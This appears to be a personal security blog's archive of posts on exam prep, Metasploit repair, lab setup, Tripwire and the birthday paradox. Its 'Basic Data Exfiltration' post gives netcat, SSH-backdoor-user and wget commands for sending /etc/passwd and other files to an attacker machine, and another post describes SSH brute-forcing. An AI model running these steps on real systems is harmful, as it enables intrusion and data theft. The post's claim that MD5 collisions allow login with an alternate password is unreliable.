Tuesday, July 16, 2013

GXPN - getz!

After many weeks of crazy after-office hours and weekends, I finally went for my first attempt and passed the GIAC GXPN http://www.giac.org/certification/exploit-researcher-advanced-penetration-tester-gxpn . It's quite a challenge and probably the hardest examination I've ever taken since my computer engineering degree days. For me, I attended Stephen Sims' class (SANS SEC660) and it was the best EVAR. Although things get pretty hairy after day 3, it's totally worth it. And I'm thankful to my company, who sponsored the hefty amount. If you're into security, it's like attending a rock concert and getting wow-ed at every juncture of the course.

If you decide, however, not to attend SANS SEC660 and still want to do a GIAC attempt, you can do so too. Some tips on preparation can be found at iPositive's blog: http://ipositivesecurity.blogspot.sg/2012/08/passed-giac-gxpn-exam.html

Btw, GXPN is a 3-hour open-book examination and you're allowed to use the course materials. Open-book examinations are usually tougher, and that kinda applies in this case too. For those who have signed up or intend to attempt the GIAC GXPN in the near future, I've made an index for a quick flip (trust me - you'll probably need it) and a "time reference" table to help keep track of time, since you can only skip 5 questions. http://pastebin.com/wwPVMiqc
Some ways to use it:
1. Use Word or some open source office tool to split the page into 3 columns
2. Cut and paste the contents from the pastebin.com link http://pastebin.com/wwPVMiqc
3. Shrink the margins or font to your preference to fit the number of pages (mine is a 2-page index)
4. You can add/remove keywords/phrases/tool names in the index to make it better for your own use.

So what's with the page?
If it says for e.g. Tool X 4.125 - it means Book 4, page 125.
If you want to know what the GIAC GXPN is like, you can also go to http://www.pwnag3.com/2012/10/gxpn-review.html to read his/her review.

So what does a candidate need to prepare?

Some tips that helped me:
1. Do the TWO practice exams - they are a good indicator. I got 60% without any book reference. Got 77% for the 2nd practice. And finally got 78%. (Not great, but I'm thankful I passed. I wish I had studied more.)
2. You have to know your basics (nmap, Cain RDP MITM, LSA, etc). They are not found in the GXPN courseware and I suspect they are from the SEC560 courseware. Not too sure about that.
3. You have to know your stuff really well. Reading is NOT good enough - you'll need to set up your lab environment and spend time working. There's really no shortcut to this - you can't braindump or brute-force your way through this exam.

NOW I AM A FREE BIRD =D Gonna go celebrate a little before returning to my side projects ;)

To the GXPN attempters: Good luck folks!

J.S out.

Friday, June 14, 2013

Fix your BTR3 4.5.0 Metasploit After Update Guide

After Kali went official, BTR3 was kinda abandoned and I got to see a lot of pissed off people online looking to fix their Backtrack 5 R3's Metasploit. Due to work requirements, I started scouring for help all over the interwebs and found a few useful instructions. Here's a post to summarize and consolidate all the help I've gotten from nice folks on the internet. Hope this step-by-step guide will un-break your Metasploit on your BTR3. It won't take more than 15 minutes. Have fun!

Main idea: Upgrade your BT's Ruby from 1.9.2 to 1.9.3

Error: You may have encountered the error when trying to get Factory Girl 4.2.0 to work while performing 'bundle install' as requested by sir Metasploit himself.
Summary of fix:
- Install 1.9.3
- Fresh install of metasploit using 'git clone' (avoid the SVN version from now on)
- And as usual, link and unbreak stuff.
Limitation of fix:
Bad news, BTR3 doesn't have Ruby 1.9.3 in the repository, so RVM is used to install that version.
You need to do '/bin/bash --login' whenever ./msfconsole is to be used.

Steps to retrieve the working version of metasploit
1. # cd /opt/
2. # rm -rf metasploit
3. # git clone --depth=1 git://github.com/rapid7/metasploit-framework metasploit

Let's open a new tab by pressing ctrl-shift-t.

Steps to install Ruby 1.9.3
1. # bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
2. # source /etc/profile.d/rvm.sh
3. # rvm -v

Let's fix up some libraries we need:
4. # for package in zlib openssl libxslt libxml2; do rvm pkg install $package; done
5. # rvm install 1.9.3

You'll get an error saying you need certain dependencies.
6. # apt-get install <dependency 1> <dependency 2> ...

And of course, libssl-dev will still be screwed, because the current repository doesn't contain the right one. Let's add one to our /etc/apt/sources.list:
7. # echo "deb http://security.ubuntu.com/ubuntu lucid-security main" >> /etc/apt/sources.list
8. # apt-get install libssl-dev 

Let's proceed to install our dear ruby 1.9.3 runtime:
9. # rvm install 1.9.3

So done? Let's switch to it. The current version will be 1.9.2-dev, so we gotta use our new shiny Ruby 1.9.3.
10. # rvm 1.9.3 --default 

You'll see an error. So you'll need a login shell, because the current one just won't do.
11. # /bin/bash --login
12. # rvm 1.9.3 --default
13. # ruby -v

Now we have our 1.9.3. But something's still broken (yes of course, of course). Let's fix the pg.
14. # apt-get install libpq-dev
15. # gem install pg

Ok. Final moment of truth, let's proceed to the metasploit folder now!
16. # cd /opt/metasploit
17. # bundle install

*DEEP BREATH* Yes. Factory Girl 4.2.0 will install properly with Ruby 1.9.3 ;) And yes, you will be able to ./msfconsole
Long load time for ./msfconsole without any error means good news.

Congratulations! (and ba*ls to backtrack for not automating the update.)

References & Acknowledgements:
http://guides.dradisframework.org/install_on_backtrack.html
https://community.rapid7.com/thread/3207

Tuesday, April 9, 2013

Metasploit broke after updating to 4.5.0bt

:(

I broke my metasploit when I did a `apt-get install metasploit` to upgrade it.
It's not 4.5.0bt but msfconsole doesn't work anymore and neither does msfupdate. Royally screwed if you ask me.

But there's a few ways to fix it:
1. http://fl3x.us/blog/2013/01/11/solving-msfconsole-msfupdate-issue-after-update-metasploit-to-4-5-0/

2. apt-get purge metasploit
then apt-get install metasploit
-> Basically a reinstallation, if 1) doesn't work for you.

I needed to do 2).

Now I'm still trying to fix msfupdate. Msfconsole restored but msfupdate's still broken. Argh.

Broke,
J.S.

Monday, March 25, 2013

Random thoughts: The Birthday Paradox

The Birthday Paradox can be explained by presenting a scenario:
The Birthday problem - 
Out of the 366 possible birthdays (including Feb 29th), what's the chance that, in a crowd of 23 people, two share a birthday? A crude guess: could it be 10%, 20% or maybe 30%? No, 50%. In fact, with only 57 people in a room, the probability shoots up to 99%.

I'm not here to explain the Math, so if you wanna know more, try visiting: (clean urls btw)

So what?
Putting this 'paradox' into hashing, colliding a super unique hash may take less time than you'd think! Say 2^32 = 4294967296 possible combinations:
Calculating every hypothetical hash at 20000 c/s would require about 59 hours.
Chance of some match with the 'birthday paradox' in mind: JUST 80000 combinations (4s) will give you 50%. Wait a minute, that can't be right?!

The generator's generated results:
Number of pairs: 3199960000 = (80000 * 79999)/2
Chance of a unique pair: 100.0000% = 4294967295/4294967296
Chance of 3199960000 unique pairs: 47.47% = (100.0000%)^3199960000
Chance of some match: 52.53% = 1 - 47.47%
Actual match: 100.00% = (1/1)
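As an added worked example (not from the original post), the Python below reproduces the numbers above and goes one step further: the exact birthday probability for a crowd, the generator's pairs-based collision estimate (pairs = k(k-1)/2, P(no match) = (1 - 1/N)^pairs), the 2^32 enumeration time at 20000 c/s, and the sample count that reaches a 50% collision for any digest width. N = 2^32, k = 80000 and the 20000 c/s rate are the post's figures.

```python
import math


def p_exact_birthday(n_people: int, days: int = 366) -> float:
    """Exact probability that at least two of n_people share one of `days` birthdays."""
    p_no_match = 1.0
    for i in range(n_people):
        p_no_match *= (days - i) / days
    return 1.0 - p_no_match


def p_collision(bits: int, samples: int) -> float:
    """Chance of at least one collision among `samples` values drawn from 2**bits outputs.

    Same estimate as the post's generator: pairs = k(k-1)/2 and
    P(no match) = (1 - 1/N)^pairs, but computed as exp(pairs * log1p(-1/N))
    so it stays precise for large N such as 2**128.
    """
    space = 2 ** bits
    pairs = samples * (samples - 1) // 2
    p_no_match = math.exp(pairs * math.log1p(-1.0 / space))
    return 1.0 - p_no_match


def samples_for_half(bits: int) -> int:
    """Smallest k with p_collision(bits, k) >= 0.5, from k(k-1)/2 = N*ln 2.

    This generalises the post's 2**32 example to any digest width
    (the familiar ~sqrt(N) birthday bound).
    """
    space = 2 ** bits
    return math.ceil((1 + math.sqrt(1 + 8 * math.log(2) * space)) / 2)


def brute_force_hours(bits: int, rate_per_s: float) -> float:
    """Hours to enumerate every one of the 2**bits outputs at the given rate."""
    return 2 ** bits / rate_per_s / 3600


if __name__ == "__main__":
    print(f"23 people, 366 days: {p_exact_birthday(23):.2%}")
    print(f"57 people, 366 days: {p_exact_birthday(57):.2%}")
    print(f"2^32 at 20000 c/s: {brute_force_hours(32, 20000):.1f} h to enumerate all")
    print(f"2^32, 80000 samples: {p_collision(32, 80000):.2%} chance of a collision")
    for bits in (32, 64, 128):
        print(f"{bits}-bit digest: ~{samples_for_half(bits):.3e} samples for a 50% collision")
```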

Ok, what's your point?
1. Of course, hashes these days are more than 32 bits. But still, I won't use MD5, as a 128-bit digest under this scheme is easier to collide than you'd think.
2. You have a better chance working with collisions than with brute force against weak hashes such as MD5 (and earlier). If a system's authentication processes passwords by hashing them and matching against the existing stored hash for verification, there's a chance you can use an alternate password to gain access. Sounds like magic - I KNOW.

* If you found some flaws in my logic or math (if any, lol) expressed above, please do help correct.  

Well, these are just some random thoughts...

Break to protect,
J.S.

Sunday, February 24, 2013

SANS SEC660

Hey all,

I'm excited to let you guys know that I'll be taking the SEC660 class offered by the SANS Institute. For the whole of next week (5.5 days), the course will be covering more advanced areas of penetration testing and I can't wait! More information on SEC660 can be found here: https://www.sans.org/course/advanced-penetration-testing-exploits-ethical-hacking

Previously, I took the 'basics' version of the curriculum by SANS, SEC560, and found that the course teaches you more than 'academic materials' or 'theories' but provides you with practical and working knowledge to do your job as a security professional. In addition, the instructors are veteran professionals themselves and they shared quite a fair bit of their on-the-job experiences, which are extremely valuable.

If you're taking SEC660 or other courses next week in Secure Singapore 2013, drop me a note to link up and I'll buy you a cuppa.

Break To Protect,
J.S.

Friday, February 15, 2013

Setting up a Penetration Testing Environment

Just a while ago, I was talking to another security enthusiast and we were discussing "how to set up a pentest environment at home". The worst thing is that I only had access to VMware Workstation, attacking from a Backtrack 5 to a vulnerable machine. But that's just ONE hop and REAL environments have multiple hops (e.g. through a firewall, DMZ, internal and one more internal).

Although I've read a couple of articles on setting up a penetration testing environment, I still had no idea how to make one until yesterday. While reading up on VMware stuff, I discovered this valuable page that solves the problem of virtualizing your attacking and victim machines with firewalls and load balancers in the equation to test. Try reading this:
http://www.vmware.com/support/ws55/doc/ws_net_configurations_custom.html

Pre-requisite:
1. RAMS, LOTSA RAMS (I'm on 8GB)
2. Enough CPU resources (I'm on i5)
3. Of course, enough HDD space (I'm on a 128 SSD and 500 HDD)
4. VMware Workstation (I'm on 8)
5. VMWare images (in this demo, I'll be using: BTR3, Smoothwall 3 Polar, An Exploitable Machine)


Configuring your VMWare Network Adaptors:
BTR5 - Two Network Adaptors
1. Bridged (or Vmnet 0)
2. VMnet 9 (Set Host-only)

Smoothwall 3 - Two Network Adaptors
1. VMnet 9 (Set Host-only)
2. VMnet 2 (Set Host-only)

Win XP / Metasploitable / Kioptrix / Other vulnerable victim machines
1. VMnet 2 (Set Host-only)

VMWare Workstation - Open Edit -> Virtual Network Editor
Add VMnet 2 and 9. DHCP is optional.

* Whatever IP you used for the VMnet, please do not use x.x.x.1 as they are used by the VMWare's Virtual Switches
Setting up your network:
BTR5 (*your eth[num] may be different, so adjust accordingly)
1. eth0 to your real local network address. Mine is 10.0.0.x/24. You'll be able to access the internet from your Backtrack 5 for apt-get installs and wget of useful tools ;)
2. eth1 to 10.0.9.3/24
set your default gateway to 10.0.9.2 (Smoothwall 3's IP)

Smoothwall 3
1. Login as 'root' using 'happydays' as password
2. set your eth0 to 10.0.9.2/24
3. set your eth1 to 10.0.2.2/24
* Remember, don't get confused with your network adaptors connecting to their respective VMnets.

Win XP
1. Set your "Local Area Connection" interface to 10.0.2.100/24 and gateway to 10.0.2.2 (Smoothwall 3's IP also)

By now you should be able to do WIN XP -PING-> BTR5 and get a response.
However, you won't be able to have BTR5 ping WIN XP for some reasons.

Now it's a good time to WEB LOGIN to your Smoothwall 3's and start configuring it.
https://10.0.2.2:441/ using 'admin' and password as 'happydays'

In this post I won't be sharing the Smoothwall's configuration for port forwarding and other settings. And REMEMBER, to make your Smoothwall's INTERFACE CONFIGURATION persistent, you'll need to CHANGE the interfaces' IP addresses using the web GUI.

Need help? Send me an email: breaktoprotect(at)gmail(dot)com

Thanks for reading. Happy fun times, people~

Break To Protect,
J.S.

Wednesday, February 13, 2013

Klutz with Local Group Policy

Part of my work requires me to perform configuration reviews of my clients' host security settings. One of them was a 2003 host, and I was experimenting with a VM image. It took me quite a while searching on Google to find out WHY my gpresult kept showing "No local group policy applied (empty)" despite me changing some settings in gpedit.msc.

Long story cut short, you NEED to set something under BOTH 'Computer Configuration' and 'User Configuration'. So even if you've set a trillion settings under 'Computer Configuration' and none under 'User Configuration', you'll get zilch when you do a gpresult /z > gpresults_%computername%.txt. And the same applies vice versa.[1]

After setting ONE item under 'User Configuration', I saw that my Local Group Policy was finally applied when I performed the gpresult. Awesome and phew~ Thank you, forum folks from www.techexams.net

Break To Protect,
J. S.


Reference(s):
[1] http://www.techexams.net/forums/mcsa-mcse-windows-2003-general/66468-gpo-were-not-applied-because-they-were-filtered-out.html

Sunday, February 10, 2013

Basic Data Exfiltration

So you pwned the system and got root access, awesome but what's next? Oh, I need to get the /etc/passwd and /etc/shadow out for a start. Ok how?

There are a couple of ways to do it:
1. Meterpreter's 'download' command
It's great if you're using meterpreter as the payload. Simple and hassle free. Just 'cd' and 'pwd' through the victim machine's directory without having to worry about the OS platform. But the limitation is if you are not using metasploit to pwn your victim machine, then you can't do this.

2. Netcat
Meow! Using this network utility to do a transfer of a binary file is definitely a viable option. 
All you'll need to do is:

Attacking Machine:~/goodies_folder/# nc -l -p 4444 > file_i_am_stealing.ext

Victim Machine:~/etc/# cat passwd | nc 192.168.1.200 4444
* 192.168.1.200 is, of course, the attacker's machine IP address, and 4444 is the port the listener above is waiting on

Let's say the machine you've compromised has a host-based firewall that whitelists ports and denies all others; there are two ways to circumvent this:
- Tweak iptables <= Not recommended, because you're changing critical configuration of the host machine. I wouldn't want to trigger the IPS or FIM monitoring this victim machine :S
- Shut down a service and hijack the port. <= Say XYZ service is a pretty much unused but available listening on port 112. Shut down the XYZ service, perform the exfil and then turn it back up. 

3. SSH
If the SSH daemon is up, create a new user e.g. ted
Victim Machine:~/# /usr/sbin/useradd ted
Victim Machine:~/# /usr/bin/passwd ted
* Set your password
Victim Machine:~/# echo "AllowUsers ted" >> /etc/ssh/sshd_config
Remember to do a netstat -tulpn | grep sshd to make sure that the SSH service is up.

Attacker's Machine:~/# ssh ted@192.168.1.100
* Enter the password you set (e.g. password123) when prompted
4. wget
Good if your victim's machine has an Apache web server up and running.
Simply copy all the files you wanna exfil to /var/www/html
and then:

Attacker's machine:~/# wget http://192.168.1.100/file_you_wanna_retrieve.ext
Again, you want to make sure that your Apache is running ;)

5. Other ways
There are a couple of more ways but I need to run already, so here's some brief mentions:
- FTP/SCP <-- Set up FTP or SCP your files through
- Covert Channels <-- You can craft ICMP packets and fit your data inside. Haven't tried it yet, but will blog it when I do.
- Email <-- It's lame, but if you got startx or you've VNC-ed into your victim's machine, you can exfil through web browsers =D

Alrighty, hope these help. Gotta run. Happy fun times~

Break To Protect,
J.S. 

Friday, January 18, 2013

Nipper Studio Licensing Protection Bypass

Greetings all,

Ever heard of Titania's Nipper Studio (previously known as Nipper One)? It's a security audit tool which takes in configuration files such as your Cisco running-configs or your SonicWall Enhanced OS configuration files and generates a very nice and comprehensive report on the device's current security posture. Especially when you don't have time to go through files and files of configurations, Nipper Studio will do the audit job for you. Unfortunately, it's NOT open-source (it was, but no longer) so you'll need to purchase it. For more information, visit: https://www.titania-security.com/nipperstudio

I was just evaluating the usefulness of the tool and wanted to move my eval license (or what's left of it) over to another computer, but I couldn't. The license codes wouldn't authenticate on the new machine. So I was just looking around the directory in the hope of 'transferring' my license over but couldn't find the license file. Guess what, it's in the registry, and after some analysis I managed to get it over. Unfortunately, I also discovered a flaw in the licensing protection. This flaw allows you to repeatedly audit devices with only 1 single working license. Hint: Work the registry ;) Such an awesome software yet with poor licensing protection - what a shame! =D

*Sorry guys, I will not be sharing the step-by-step cracking as you know, lawsuit, -$, jail-term, blah.

** If you happen to be Titania, and wish to find out more on the license exploitation, please contact me: breaktoprotect@gmail.com and I'll gladly work with you to resolve this. And of course, I'd expect you to at least buy me at least a cup of coffee. :)

Break to protect,
J.S.


Wednesday, January 16, 2013

Kioptrix Noob-ing #1

As usual, I'll be reading PDF books on my tablet on my way to work. Train rides can get really boring. Anyhow, I'm currently reading "Advanced Penetration Testing for Highly-Secured Environments: The Ultimate Security Guide". I'm 100+ pages into it and I must say it has been informative. Get yours at http://www.amazon.com/Advanced-Penetration-Testing-Highly-Secured-Environments/dp/1849517746 or from your *ahem* friends who might have it.

So while I was perusing the pages, it recommended a Virtual Machine (VM) called Kioptrix, downloadable at: http://www.kioptrix.com/blog/ for security testing purposes. The main objective is to obtain ROOT privileges through whatever ways you can think of: dictionary/bruteforce password, exploit, etc. (but since you can't do client-side attacks, you probably can't social engineer, drive-by, mitm/sniff, etc). Although port 80 (and 443) are open, you might not be able to do much via web attacks (but I might be wrong, so drop a comment if you manage to do it =P ).

Metasploit on Debian Raspberry (Soft-float) - Bad idea
Still obsessed with my little ARM friend, I tried to install Metasploit on it. BUT, big BUT, it is SLOW. I don't mean "ah, takes 15 seconds" but "WTF, it's been 5 minutes and I can't even bring up msfconsole" slow. Annoyed as hell, I decided to rm -r msf3. I'll go back to BackTrack when I decide to proceed with an exploit. Yes, with several sweet ports open I would like to toss in some ready-made attacks to gain a shell. However, I shall reserve that for later.


*SPOILER ALERT*: Although I'm not pasting the results of the Kioptrix, I might reveal a few things that you may wish to discover yourself while playing around with Kioptrix. If you want to do Kioptrix all by your own without any influence/advice/help, please do not view the content below. You have been warned!

Recon & Next step against Kioptrix 
You can't do much except see this very nice screen via VMware Workstation (or VMware Player):

This VM will sit in your subnet. So if you're on 192.168.0.0/24, it might be a 192.168.0.5.
Remember, you'll need a DHCP (in this case my home router) in order for Kioptrix to get its IP.

So what I did so far:
1. Fping - sweep the whole friggin' subnet and identify the sore thumb.
2. Nmap - your fundamental reconnaissance, preferably with OS detection and NSE scripts.
* I won't be pasting the spoiler results.
3. Bruteforce - even as I speak, my good ol' Rasp pal is bruteforcing the crap out of the Kioptrix. 

Python SSH Bruteforce
It's the standard garden variety bruteforcing in attempt to login by "guessing" the password on the SSH server listening on port 22. Either you do the dictionary attack (commonly used words, phrases, etc) or a literal bruteforce (every possible character set) and then pray that you get in. Not very elegant but heck, if it works, why not?
Btw, I'm using Christian Martorella's python program. More instructions at:
http://zeldor.biz/2011/01/how-to-bruteforce-ssh/ 
with the password list:
wget http://dazzlepod.com/site_media/txt/passwords.txt
I've been wanting to install Nessus 5 on it but it seems it only supports the i386/x86-64 architectures, not the RPi's ARM. Meanwhile, I'll keep searching for decent vulnerability scanners that can be installed and used on the RPi.

Happy fun times~

Break To Protect,
J.S.

Monday, January 14, 2013

Basics FIM-ing

What's FIM?
FIM stands for 'File Integrity Monitoring'. It's a host-based IDS that detects any changes to files, especially those which sit in critical directories such as /etc/, /boot/, /lib/modules, /root/ or, on Windows, your System or System32 folder. You get to pick and choose ;)

How does it work?
The FIM hashes (MD5, SHA-1, etc) the target file or directory chosen for protection, and then securely keeps this 'hash' as a BASELINE. Periodically, the FIM does the same hashing task and compares the result with the BASELINE 'hashes' generated previously.
e.g. I want to monitor /folderX/ and its contents.
The FIM can be set to trigger warning if:
#1 Attackers add/remove files within /folderX/
or
#2 Attackers EDIT one of my existing files within /folderX/

This means that if any attacker attempts to upload foreign objects, be it malware or a netcat program into the monitored system, the FIM will trip and the administrators will start their prowl. 
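As an added example (not part of the post and not Tripwire's code), the toy FIM below does exactly what the two triggers above describe: it baselines a folderX with SHA-256, then reports files that were added, removed or edited. The folderX layout, file contents and the dropped "nc" binary are constructed for the demo.

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path


def hash_file(path: Path, chunk: int = 65536) -> str:
    """SHA-256 of one file, read in chunks so large binaries are not loaded whole."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict:
    """Hash every regular file under root; keys are POSIX paths relative to root."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if path.is_file() and not path.is_symlink():
                baseline[path.relative_to(root).as_posix()] = hash_file(path)
    return baseline


def check_integrity(root: Path, baseline: dict) -> dict:
    """Re-hash the tree and report trigger #1 (add/remove) and #2 (edit) vs. the baseline."""
    current = build_baseline(root)
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(
            name for name in baseline.keys() & current.keys()
            if baseline[name] != current[name]
        ),
    }


def demo() -> dict:
    """Constructed scenario: baseline a folderX, then simulate the changes the post describes."""
    with tempfile.TemporaryDirectory() as tmp:
        folder = Path(tmp) / "folderX"
        (folder / "conf").mkdir(parents=True)
        (folder / "conf" / "app.cfg").write_text("listen=127.0.0.1\n")
        (folder / "run.sh").write_text("#!/bin/sh\necho ok\n")

        # A real FIM keeps the baseline off-host or on read-only media, since an
        # attacker with root could otherwise just re-baseline; here it is
        # round-tripped through JSON to mimic the persisted database.
        stored = json.loads(json.dumps(build_baseline(folder)))

        (folder / "nc").write_bytes(b"\x7fELF")                        # foreign binary dropped
        (folder / "conf" / "app.cfg").write_text("listen=0.0.0.0\n")  # existing file edited
        (folder / "run.sh").unlink()                                   # file removed
        return check_integrity(folder, stored)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```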

So, what's cooking?
To avoid such an IDS, the first step is to play around with one in your own lab environment. So I've downloaded Tripwire (www.tripwire.org) on my Debian Raspberry Pi to experiment around a little. If you're using Debian, you can get it by:
sudo apt-get install tripwire

* If you get some funky error messages, do this first: 
sudo apt-get update

Setting up isn't hard. To trigger the Tripwire for testing purposes, just add a random txt file in your /root/: 
sudo touch /root/intrusion_vector.txt
And it should trip when you do a:
sudo tripwire --check 
But of course, these are NOT the full instructions. There are config and policy files to talk about. As for the steps from "compiling" the policy files, generating the baseline database, to the cron job that continually performs the --check command, I'm not really inclined to explain them as I've found one site which is extremely helpful. So I'll recommend Meryll Larkin's tutorial on Tripwire:
http://www.alwanza.com/howTo/linux/tripwire.html
She's a lifesaver for setting this FIM up! :) Thanks, Larkin.

If you need some help, feel free to drop your comments below and I'll see what I can do.

Peace out,
J.S.

Tuesday, January 8, 2013

Hello World, and what is this?

This is an online journal to pen down my personal experience gained from performing security testing. What is to be achieved through writing this blog:
1. A Journal - a record of my findings, experience, discovery, etc. So basically a platform for my own recollection needs and at the same time share the information. Information should be free.
2. A Guide - may not be as useful for the veterans but will attempt to provide security 101 to non-security folks
3. A Challenge - for myself to consistently grow in knowledge and skills. I'm thinking of doing 'a hack a week' to bring my lazy ass to learn. Hmm...

Lastly, I'm nowhere near a pro. But I'm working towards becoming better and attempting to bring value to the community. And at times, I may be presenting the work of past giants and today's experts for educational purposes. If I've forgotten to credit you, please know that I have no intention to plagiarize nor claim credit for work I have not done, and DO email me and I'll make the wrong right. ;)

Thanks for reading!

Disclaimer: Use this site at your own risk. This site is meant for educational purposes only. And if you decide to use it for crimes and you're caught, you can be sure that you and your ass will be thrown in federal prison before you can even attempt to utter an excuse. So, be a responsible hacker who contributes to the security space, not a criminal nutcase. When in doubt about a certain tool and its potential impact, don't use it on production systems.

Break To Protect,
J.S.